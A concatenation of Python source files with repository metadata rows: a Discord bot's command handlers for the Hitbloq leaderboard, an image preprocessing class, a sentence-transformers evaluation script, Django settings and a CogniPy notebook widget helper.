                                    await message.channel.send(message.author.mention + ' created the map pool `' + new_pool_id + '`! Head over to ' + pool_channel.mention + ' to manage your new pool.')
                                else:
                                    await message.channel.send(message.author.mention + ' You\'ve already created too many pools.')
                            else:
                                await message.channel.send(message.author.mention + ' This pool ID contains forbidden characters. It may only include lowercase letters, numbers, and underscores.')
                        else:
                            await message.channel.send(message.author.mention + ' This pool ID has been taken.')
                    else:
                        await message.channel.send(message.author.mention + ' You must be a CR Farmer or CR Grinder patron to use this command.')
                except IndexError:
                    await message.channel.send(message.author.mention + ' invalid arguments. Should be `!create_pool <new_pool_id>`.')
        # ---------------- general commands ----------------
        if message.channel.name == GENERAL_COMMANDS_CHANNEL:
            if message_args[0] == '!add':
                # Queue a ScoreSaber profile for import; processed asynchronously.
                scoresaber_id = message_args[1]
                create_action.create_user(scoresaber_id)
                await message.channel.send(message.author.mention + ' user ' + scoresaber_id + ' has been added to the action queue.\nhttps://hitbloq.com/actions')
            if message_args[0] == '!views':
                await message.channel.send(message.author.mention + ' Hitbloq has accumulated ' + str(int(database.get_counter('views')['count'])) + ' views!')
        # ---------------- admin commands ----------------
        if message.channel.name == ADMIN_COMMANDS_CHANNEL:
            if message_args[0] == '!set_event':
                event_data = ' '.join(message_args[1:])
                if event_data == '':
                    # No payload clears the current event (sentinel id -1).
                    database.db['events'].update_one({'_id': 'current_event'}, {'$set': {'event_id': -1}})
                    await message.channel.send(message.author.mention + ' the current event has been updated to `none`.')
                else:
                    try:
                        # Single quotes are tolerated in the pasted JSON payload.
                        event_data = json.loads(event_data.replace('\'', '"'))
                        event_data = {
                            '_id': int(event_data['_id']),
                            'title': str(event_data['title']),
                            'image': str(event_data['image']),
                            'description': str(event_data['description']),
                            'pool': str(event_data['pool']),
                            'urt_description': str(event_data['description']) if 'urt_description' not in event_data else str(event_data['urt_description']),
                            'urt_title': str(event_data['title']) if 'urt_title' not in event_data else str(event_data['urt_title']),
                        }
                        database.db['events'].replace_one({'_id': event_data['_id']}, event_data, upsert=True)
                        database.db['events'].update_one({'_id': 'current_event'}, {'$set': {'event_id': event_data['_id']}})
                        await message.channel.send(message.author.mention + ' the current event has been updated to `' + str(event_data['_id']) + '`.')
                    except:
                        await message.channel.send(message.author.mention + ' there was an error in the formatting of the event data.')
            if message_args[0] == '!delete_pool':
                pool_id = message_args[1]
                database.delete_map_pool(pool_id)
                await message.channel.send(message.author.mention + ' deleted the `' + pool_id + '` map pool.')
            if message_args[0] == '!stop_bot':
                await message.channel.send(message.author.mention + ' stopping... :(')
                sys.exit()
            if message_args[0] == '!recalculate_cr':
                map_pools = message_args[1].split(',')
                create_action.recalculate_cr(map_pools)
                await message.channel.send(message.author.mention + ' a cr recalculation for `' + str(map_pools) + '` has been added to the action queue.\nhttps://hitbloq.com/actions')
            if message_args[0] == '!update_rank_histories':
                for pool_id in database.get_pool_ids(False):
                    create_action.update_rank_histories(pool_id)
                await message.channel.send(message.author.mention + ' a full player history update has been added to the action queue.\nhttps://hitbloq.com/actions')
            if message_args[0] == '!set_announcement':
                # Raw HTML stored verbatim; empty payload clears the banner.
                announcement_html = ' '.join(message_args[1:])
                if announcement_html == '':
                    database.db['config'].update_one({'_id': 'announcement'}, {'$set': {'html': None}})
                else:
                    database.db['config'].update_one({'_id': 'announcement'}, {'$set': {'html': announcement_html}})
            if message_args[0] == '!rewind':
                # Push a user's last_update timestamp back so their scores re-sync.
                rewind_id = int(message_args[1])
                rewind_amount = int(message_args[2])
                rewind_amount = max(0, rewind_amount)
                rewind_to = time.time() - rewind_amount
                database.db['users'].update_one({'_id': rewind_id}, {'$set': {'last_update': rewind_to}})
                create_action.update_user(rewind_id)
                await message.channel.send(message.author.mention + ' user ' + str(rewind_id) + ' will be rewinded and updated.')
        # ---------------- pool-admin commands ----------------
        if message.channel.name == POOL_ADMIN_COMMANDS_CHANNEL:
            if message_args[0] == '!regenerate_playlists':
                create_action.regenerate_playlists()
                await message.channel.send(message.author.mention + ' hashlist generation has been added to the action queue.\nhttps://hitbloq.com/actions')
            if message_args[0] == '!set_playlist_cover':
                valid_host = 'https://i.imgur.com/'
                pool_id = message_args[1]
                image_url = message_args[2]
                if pool_id in database.get_pool_ids(True):
                    if database.is_pool_owner(pool_id, message.author.id):
                        if (image_url[:len(valid_host)] != valid_host) or (image_url.split('.')[-1] != 'png'):
                            await message.channel.send(message.author.mention + ' the image URL must come from ' + valid_host + ' and be a PNG')
                        else:
                            database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'playlist_cover': image_url}})
                            await message.channel.send(message.author.mention + ' the pool image has been updated')
                    else:
                        await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!set_banner_title_hide':
                try:
                    pool_id = message_args[1]
                    boolean = message_args[2].lower()
                    if database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
                        if boolean in ['true', 'false']:
                            if boolean == 'true':
                                hide = True
                            else:
                                hide = False
                            database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'banner_title_hide': hide}})
                            await message.channel.send(message.author.mention + ' set banner title visibility to `' + str(hide) + '`.')
                        else:
                            await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_banner_title_hide <pool_id> true/false`')
                    else:
                        await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
                except IndexError:
                    await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_banner_title_hide <pool_id> true/false`')
            if message_args[0] == '!set_accumulation_constant':
                try:
                    pool_id = message_args[1]
                    accumulation_constant = float(message_args[2])
                    if database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
                        database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'accumulation_constant': accumulation_constant}})
                        await message.channel.send(message.author.mention + ' The accumulation constant for the ' + pool_id + ' pool has been set to `' + str(accumulation_constant) + '`.')
                    else:
                        await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
                except IndexError:
                    await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_accumulation_constant <pool_id> <constant>`')
            if message_args[0] == '!set_shown_name':
                try:
                    pool_id = message_args[1]
                    shown_name = ' '.join(message_args[2:])
                    if shown_name == '':
                        await message.channel.send(message.author.mention + ' shown name must not be an empty string.')
                    elif database.is_pool_owner(pool_id, message.author.id) or is_admin(message.author):
                        database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'shown_name': full_clean(shown_name)}})
                        await message.channel.send(message.author.mention + ' The shown name for the ' + pool_id + ' pool has been set to `' + shown_name + '`.')
                    else:
                        await message.channel.send(message.author.mention + ' You do not have permissions to modify this pool.')
                except IndexError:
                    await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_shown_name <pool_id> <shown_name>`')
            if message_args[0] == '!set_owners':
                try:
                    pool_id = message_args[1]
                    valid_permissions = False
                    if is_admin(message.author):
                        valid_permissions = True
                    else:
                        if database.is_pool_owner(pool_id, message.author.id):
                            valid_permissions = True
                    if valid_permissions:
                        owner_list = [user.id for user in message.mentions]
                        # The caller must keep themselves as an owner to avoid
                        # accidentally orphaning the pool.
                        if message.author.id in owner_list:
                            database.set_pool_owners(pool_id, owner_list)
                            # add map pool people role to all owners
                            role = get(active_guild.roles, name='map pool people')
                            for user in message.mentions:
                                await user.add_roles(role)
                            await message.channel.send(' '.join([user.mention for user in message.mentions]) + ' You have been set to the owner(s) of the `' + pool_id + '` pool.')
                        else:
                            await message.channel.send(message.author.mention + ' You must list yourself as an owner. If you would like to delete the pool, please contact an admin.')
                    else:
                        await message.channel.send(message.author.mention + ' Sorry, but you don\'t have permissions to modify this pool.')
                except IndexError:
                    await message.channel.send(message.author.mention + ' invalid arguments. Should be `!set_owners <pool_id> @owner1 @owner2 etc.`')
            if message_args[0] == '!set_img':
                valid_host = 'https://i.imgur.com/'
                pool_id = message_args[1]
                image_url = message_args[2]
                if pool_id in database.get_pool_ids(True):
                    if database.is_pool_owner(pool_id, message.author.id):
                        if (image_url[:len(valid_host)] != valid_host) or (image_url.split('.')[-1] != 'png'):
                            await message.channel.send(message.author.mention + ' the image URL must come from ' + valid_host + ' and be a PNG')
                        else:
                            database.db['ranked_lists'].update_one({'_id': pool_id}, {'$set': {'cover': image_url}})
                            await message.channel.send(message.author.mention + ' the pool image has been updated')
                    else:
                        await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!recalculate_cr':
                pool_id = message_args[1]
                if pool_id in database.get_pool_ids(True):
                    if database.is_pool_owner(pool_id, message.author.id):
                        create_action.recalculate_cr([pool_id])
                        await message.channel.send(message.author.mention + ' the action queue has been updated with the recalc request for ' + pool_id + '.\nhttps://hitbloq.com/actions')
                    else:
                        await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!set_manual':
                # Pin a leaderboard to a fixed star rating for one pool.
                song_id = message_args[1]
                pool_id = message_args[2]
                forced_rating = float(message_args[3])
                if pool_id in database.get_pool_ids(True):
                    matched_leaderboards = database.get_leaderboards([song_id])
                    if not len(matched_leaderboards):
                        await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
                    else:
                        if database.is_pool_owner(pool_id, message.author.id):
                            database.db['leaderboards'].update_one({'_id': song_id}, {'$set': {'forced_star_rating.' + pool_id: forced_rating}})
                            await message.channel.send(message.author.mention + ' switched the leaderboard to manual star ratings (' + str(forced_rating) + ').')
                        else:
                            await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!set_automatic':
                # Remove the forced rating so the pool's curve computes it again.
                song_id = message_args[1]
                pool_id = message_args[2]
                if pool_id in database.get_pool_ids(True):
                    matched_leaderboards = database.get_leaderboards([song_id])
                    if not len(matched_leaderboards):
                        await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
                    else:
                        if database.is_pool_owner(pool_id, message.author.id):
                            database.db['leaderboards'].update_one({'_id': song_id}, {'$unset': {'forced_star_rating.' + pool_id: 1}})
                            await message.channel.send(message.author.mention + ' switched the leaderboard to automatic star ratings.')
                        else:
                            await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!rank':
                song_id = message_args[1]
                pool_id = message_args[2]
                if pool_id in database.get_pool_ids(True):
                    # Confirm the map exists on BeatSaver before queueing.
                    song_data = beatsaver_interface.verify_song_id(song_id)
                    if song_data:
                        if database.is_pool_owner(pool_id, message.author.id):
                            create_action.rank_song(song_id, pool_id)
                            await message.channel.send(message.author.mention + ' the action queue has been updated with the rank request for:\n' + song_data['metadata']['songName'] + ' - ' + song_id.split('|')[-1][1:] + '\n(<https://beatsaver.com/beatmap/' + song_data['id'] + '>)!\nhttps://hitbloq.com/actions')
                        else:
                            await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                    else:
                        await message.channel.send(message.author.mention + ' that song ID appears to be invalid')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!unrank':
                song_id = message_args[1]
                pool_id = message_args[2]
                if pool_id in database.get_pool_ids(True):
                    if database.is_pool_owner(pool_id, message.author.id):
                        create_action.unrank_song(song_id, pool_id)
                        await message.channel.send(message.author.mention + ' the action queue has been updated with the unrank request for:\n' + song_id + '\nhttps://hitbloq.com/actions')
                    else:
                        await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
            if message_args[0] == '!set_curve':
                pool_id = message_args[1]
                if pool_id in database.get_pool_ids(True):
                    if database.is_pool_owner(pool_id, message.author.id):
                        try:
                            json_data = json.loads(' '.join(message_args[2:]))
                            if json_data['type'] in curves:
                                if invalid_curve_data(json_data):
                                    await message.channel.send(message.author.mention + ' Invalid curve config: ' + invalid_curve_data(json_data))
                                else:
                                    database.set_pool_curve(pool_id, json_data)
                                    await message.channel.send(message.author.mention + ' the curve for ' + pool_id + ' has been updated. You may want to run `!recalculate_cr ' + pool_id + '`.')
                            else:
                                await message.channel.send(message.author.mention + ' the specified curve does not exist.')
                        except:
                            await message.channel.send(message.author.mention + ' the JSON formatting is invalid.')
                    else:
                        await message.channel.send(message.author.mention + ' you don\'t have permissions to modify this pool')
                else:
                    await message.channel.send(message.author.mention + ' that pool ID appears to be invalid')
# Start the bot's event loop; blocks until the process exits.
client.run(token)
| 63.348718
| 313
| 0.551769
| 0
| 0
| 0
| 0
| 22,727
| 0.919898
| 22,699
| 0.918765
| 5,890
| 0.238404
|
3673734968412c54bc6045e1a17de68b5afe3f70
| 1,885
|
py
|
Python
|
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
GUI/preprocessing.py
|
muhammadtarek98/Graduation-project
|
48f8df3b38c17f99787c8ffbe8f2bdcac166fce2
|
[
"MIT"
] | null | null | null |
import numpy as np
import cv2 as cv
import os
from PIL import Image
class preprocessing:
    """Convert axial/coronal/sagittal slice images into .npy stacks under temp/.

    Each *_path argument is a bracketed, comma-separated list of quoted image
    paths (e.g. "[\"a.png\", \"b.png\"]") — presumably produced by the GUI
    layer; confirm against the caller.
    """

    def __init__(self, axial_path, coronal_path, sagittal_path):
        # Strip the surrounding brackets, split into individual path tokens,
        # and process the three planes in a fixed order.
        planes = (
            (axial_path, 'axial.npy'),
            (coronal_path, 'coronal.npy'),
            (sagittal_path, 'sagittal.npy'),
        )
        for raw_list, file_name in planes:
            self.to_numpy(raw_list[1:-1].split(','), file_name)
        return

    def to_numpy(self, images, file_name):
        """Denoise + resize each image and save the stack to temp/<file_name>."""
        if not os.path.exists('temp'):
            os.mkdir('temp')
        stacked = []
        for token in images:
            # Each token is a quoted path, possibly with surrounding spaces.
            path = token.strip()[1:-1]
            cleaned = self.denoise_image(cv.imread(path))
            resized = self.resize_image(cleaned)
            pixels = np.array(resized, dtype='uint8')
            # Keep a single channel; the denoised image is grayscale-masked BGR.
            stacked.append(pixels[:, :, 0])
        np.save(r'temp/{}'.format(file_name), stacked)
        return

    def resize_image(self, img):
        """Resize to 256x256, choosing the interpolation by original size."""
        pixles = 256
        oversized = img.shape[0] > pixles or img.shape[1] > pixles
        interpolation = cv.INTER_CUBIC if oversized else cv.INTER_LINEAR
        return cv.resize(img, (pixles, pixles), interpolation=interpolation)

    def denoise_image(self, image):
        """Mask the image down to its largest bright contour (removes background)."""
        gray = cv.cvtColor(image, cv.COLOR_BGR2GRAY)
        _, edge = cv.threshold(gray, 30, 255, cv.THRESH_BINARY)
        found, _ = cv.findContours(edge, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_SIMPLE)
        largest = sorted(found, key=cv.contourArea, reverse=True)[0]
        mask = np.zeros(image.shape[:2], np.uint8)
        mask = cv.drawContours(mask, [largest], -1, (255), -1)
        return cv.bitwise_and(image, image, mask=mask)
| 37.7
| 83
| 0.606897
| 1,816
| 0.963395
| 0
| 0
| 0
| 0
| 0
| 0
| 76
| 0.040318
|
36740a39b572e9f7d2dc74c2436385fe4043acca
| 3,022
|
py
|
Python
|
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | 5
|
2020-12-25T07:22:54.000Z
|
2022-02-15T16:35:19.000Z
|
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | null | null | null |
examples/generate_og_predictions.py
|
dennlinger/sentence-transformers
|
67e82af977fbb198142ede7fbe941b74f8ce6c89
|
[
"Apache-2.0"
] | 2
|
2021-04-04T17:50:25.000Z
|
2021-11-18T01:17:21.000Z
|
"""
The system RoBERTa trains on the AGB dataset with softmax loss function.
At every 1000 training steps, the model is evaluated on the AGB dev set.
"""
from torch.utils.data import DataLoader
from sentence_transformers import models, losses
from sentence_transformers import SentencesDataset, LoggingHandler, SentenceTransformer
from sentence_transformers.evaluation import EmbeddingSimilarityEvaluator, LabelGenerationEvaluator
from sentence_transformers.readers import *
import logging
import torch
import os
#### Just some code to print debug information to stdout
logging.basicConfig(format='%(asctime)s - %(message)s',
                    datefmt='%Y-%m-%d %H:%M:%S',
                    level=logging.INFO,
                    handlers=[LoggingHandler()])
#### /print debug information to stdout
# # Read the dataset
# Walk run1..run5, evaluating every matching saved model against the og-test
# set and writing prediction CSVs next to each model.
root_dir = "/data/salmasian/sentence_transformers"
for i in range(1, 6):
    run_dir = os.path.join(root_dir, f"run{i}")
    for model_dir in sorted(os.listdir(run_dir)):
        curr_dir = os.path.join(run_dir, model_dir)
        # skip non-consecutive models
        if f"og_{i}" not in curr_dir:
            continue
        print(f"Working on model {model_dir}")
        # Delete when we re-evaluate...
        labels_file = os.path.join(curr_dir, "prediction_labels.csv")
        pred_file = os.path.join(curr_dir, "prediction_results.csv")
        if os.path.isfile(labels_file):
            os.remove(os.path.join(curr_dir, "prediction_labels.csv"))
        if os.path.isfile(pred_file):
            os.remove(os.path.join(curr_dir, "prediction_results.csv"))
        # Model path
        model_save_path = curr_dir
        batch_size = 24
        agb_reader = TestAGBReader('datasets/og-test')
        train_num_labels = agb_reader.get_num_labels()
        model = SentenceTransformer(model_save_path, device="cuda:0")
        # Rebuild the softmax head and restore its trained weights so the
        # evaluator can produce label predictions.
        train_loss = losses.SoftmaxLoss(model=model,
                                        sentence_embedding_dimension=model.get_sentence_embedding_dimension(),
                                        num_labels=train_num_labels)
        train_loss.classifier = torch.load(os.path.join(model_save_path, "2_Softmax/pytorch_model.bin"))
        print("test")
        test_dir = "/data/daumiller/sentence-transformers/examples/datasets/og-test"
        for fn in sorted(os.listdir(test_dir)):
            examples = agb_reader.get_examples(fn)
            if not examples:
                continue
            # Hack to avoid problems with docs almost as long as batch size
            if len(examples) == batch_size + 1:
                batch_size_used = batch_size - 3
            else:
                batch_size_used = batch_size
            test_data = SentencesDataset(examples=examples, model=model, shorten=True)
            test_dataloader = DataLoader(test_data, shuffle=False, batch_size=batch_size_used)
            evaluator = LabelGenerationEvaluator(test_dataloader, softmax_model=train_loss)
            model.evaluate(evaluator, model_save_path)
| 45.104478
| 110
| 0.666115
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 758
| 0.250827
|
3674bf513c78cb14c7a7197f8717bd835994b08c
| 9,730
|
py
|
Python
|
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
config/settings/defaults.py
|
lucaluca/palimpsest
|
64565d1b188d68bc978253a21a98440b769e26ee
|
[
"BSD-3-Clause"
] | null | null | null |
"""
Base settings to build other settings files upon.
"""
import environ
ROOT_DIR = environ.Path(__file__) - 3 # (palimpsest/config/settings/base.py - 3 = palimpsest/)
APPS_DIR = ROOT_DIR.path('palimpsest')
env = environ.Env()
READ_DOT_ENV_FILE = env.bool('DJANGO_READ_DOT_ENV_FILE', default=False)
if READ_DOT_ENV_FILE:
# OS environment variables take precedence over variables from .env
env.read_env(str(ROOT_DIR.path('.env')))
# GENERAL
# ------------------------------------------------------------------------------
DEBUG = env.bool('DJANGO_DEBUG', False)
# BUG FIX: 'CST' is not a valid IANA tz database name -- pytz/zoneinfo raise
# on it the first time the timezone is activated. Use the canonical zone for
# US Central time (handles CST/CDT transitions).
TIME_ZONE = 'America/Chicago'
LANGUAGE_CODE = 'en-us'
SITE_ID = 1
USE_I18N = False
USE_L10N = True
USE_TZ = True
# DATABASES
# ------------------------------------------------------------------------------
# SQLite by default; the database file lives inside the app directory.
DATABASES = {
    'default': {
        'ENGINE': 'django.db.backends.sqlite3',
        # BUG FIX: this module never imports `os`, so os.path.join raised
        # NameError at import time. Build the path with the environ.Path
        # helper already used throughout this file.
        'NAME': str(APPS_DIR.path('db.sqlite3')),
    }
}
# URLS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = 'config.urls'
WSGI_APPLICATION = 'config.wsgi.application'
# APPS
# ------------------------------------------------------------------------------
DJANGO_APPS = [
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize',
'django.contrib.admin',
]
THIRD_PARTY_APPS = [
'crispy_forms',
'allauth',
'allauth.account',
'allauth.socialaccount',
'rest_framework',
]
LOCAL_APPS = [
'users',
]
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
# MIGRATIONS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#migration-modules
MIGRATION_MODULES = {
'sites': 'palimpsest.contrib.sites.migrations'
}
# AUTHENTICATION
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#authentication-backends
AUTHENTICATION_BACKENDS = [
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend',
]
AUTH_USER_MODEL = 'users.User'
LOGIN_REDIRECT_URL = 'users:redirect'
LOGIN_URL = 'account_login'
# PASSWORDS
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#password-hashers
PASSWORD_HASHERS = [
# https://docs.djangoproject.com/en/dev/topics/auth/passwords/#using-argon2-with-django
'django.contrib.auth.hashers.Argon2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2PasswordHasher',
'django.contrib.auth.hashers.PBKDF2SHA1PasswordHasher',
'django.contrib.auth.hashers.BCryptSHA256PasswordHasher',
'django.contrib.auth.hashers.BCryptPasswordHasher',
]
# https://docs.djangoproject.com/en/dev/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{ 'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator', },
{ 'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator', },
]
# MIDDLEWARE
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#middleware
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
# STATIC
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = str(ROOT_DIR('staticfiles'))
# https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = [
str(APPS_DIR.path('static')),
]
# https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
# MEDIA
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = str(APPS_DIR('media'))
# https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
# TEMPLATES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#templates
TEMPLATES = [
{
# https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-TEMPLATES-BACKEND
'BACKEND': 'django.template.backends.django.DjangoTemplates',
# https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
'DIRS': [
str(APPS_DIR.path('templates')),
],
'OPTIONS': {
# https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
'debug': DEBUG,
# https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
# https://docs.djangoproject.com/en/dev/ref/templates/api/#loader-types
'loaders': [
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
],
# https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.template.context_processors.i18n',
'django.template.context_processors.media',
'django.template.context_processors.static',
'django.template.context_processors.tz',
'django.contrib.messages.context_processors.messages',
],
},
},
]
# http://django-crispy-forms.readthedocs.io/en/latest/install.html#template-packs
CRISPY_TEMPLATE_PACK = 'bootstrap4'
# FIXTURES
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#fixture-dirs
FIXTURE_DIRS = (
str(APPS_DIR.path('fixtures')),
)
# EMAIL
# ------------------------------------------------------------------------------
# https://docs.djangoproject.com/en/dev/ref/settings/#email-backend
EMAIL_BACKEND = env('DJANGO_EMAIL_BACKEND', default='django.core.mail.backends.smtp.EmailBackend')
# ADMIN
# ------------------------------------------------------------------------------
# Django Admin URL.
ADMIN_URL = env('DJANGO_ADMIN_URL', default='admin/')
# https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = [
("""Jonathan Giuffrida""", 'me@jcgiuffrida.com'),
]
# https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
# Celery
# ------------------------------------------------------------------------------
INSTALLED_APPS += ['palimpsest.taskapp.celery.CeleryAppConfig']
if USE_TZ:
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-timezone
CELERY_TIMEZONE = TIME_ZONE
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-broker_url
CELERY_BROKER_URL = env('CELERY_BROKER_URL')
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_backend
CELERY_RESULT_BACKEND = CELERY_BROKER_URL
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-accept_content
CELERY_ACCEPT_CONTENT = ['json']
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-task_serializer
CELERY_TASK_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#std:setting-result_serializer
CELERY_RESULT_SERIALIZER = 'json'
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_TIME_LIMIT = 5 * 60
# http://docs.celeryproject.org/en/latest/userguide/configuration.html#task-soft-time-limit
# TODO: set to whatever value is adequate in your circumstances
CELERYD_TASK_SOFT_TIME_LIMIT = 60
# DJANGO-ALLAUTH
# https://django-allauth.readthedocs.io/en/latest/configuration.html
# ------------------------------------------------------------------------------
ACCOUNT_ALLOW_REGISTRATION = env.bool('DJANGO_ACCOUNT_ALLOW_REGISTRATION', True)
ACCOUNT_AUTHENTICATION_METHOD = 'username'
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_EMAIL_VERIFICATION = 'mandatory'
ACCOUNT_ADAPTER = 'palimpsest.users.adapters.AccountAdapter'
SOCIALACCOUNT_ADAPTER = 'palimpsest.users.adapters.SocialAccountAdapter'
# django-compressor
# ------------------------------------------------------------------------------
# https://django-compressor.readthedocs.io/en/latest/quickstart/#installation
INSTALLED_APPS += ['compressor']
STATICFILES_FINDERS += ['compressor.finders.CompressorFinder']
# Your stuff...
# ------------------------------------------------------------------------------
| 40.041152
| 100
| 0.626619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 7,353
| 0.755704
|
3674e5cf5b0c10311bddd2c6d6dd783cd12f6998
| 5,992
|
py
|
Python
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 34
|
2020-10-31T23:55:43.000Z
|
2022-02-09T12:46:46.000Z
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 38
|
2020-10-31T11:16:01.000Z
|
2022-02-01T12:08:11.000Z
|
cognipy/edit.py
|
jswiatkowski/cognipy
|
44a6e32a44253d4965e03a9021a69134c033d041
|
[
"Apache-2.0"
] | 9
|
2021-03-22T18:42:11.000Z
|
2022-03-17T18:35:06.000Z
|
import ipywidgets as widgets
from traitlets import Unicode, Int, validate
import os
import json
from datetime import datetime,timedelta
from IPython.display import Javascript
from IPython.display import HTML
from cognipy.ontology import Ontology
from IPython.display import clear_output
_JS_initialized = False
def _InitJS():
    """Inject edit.js and a welcome banner into the notebook, once per kernel.

    Subsequent calls are no-ops (guarded by the module-level _JS_initialized
    flag), so every widget constructor can call this unconditionally.
    """
    global _JS_initialized
    if _JS_initialized:
        return
    # BUG FIX: `display` is only injected as a builtin when running inside an
    # IPython kernel; import it explicitly so this module also works when
    # imported outside a notebook.
    from IPython.display import display
    with open(os.path.dirname(os.path.abspath(__file__)) + "/edit.js", 'r') as file:
        # Flag is set before the display calls, matching the original
        # semantics: a failed display does not trigger re-injection.
        _JS_initialized = True
        display(Javascript(file.read()))
        display(HTML("Welcome to CogniPy"))
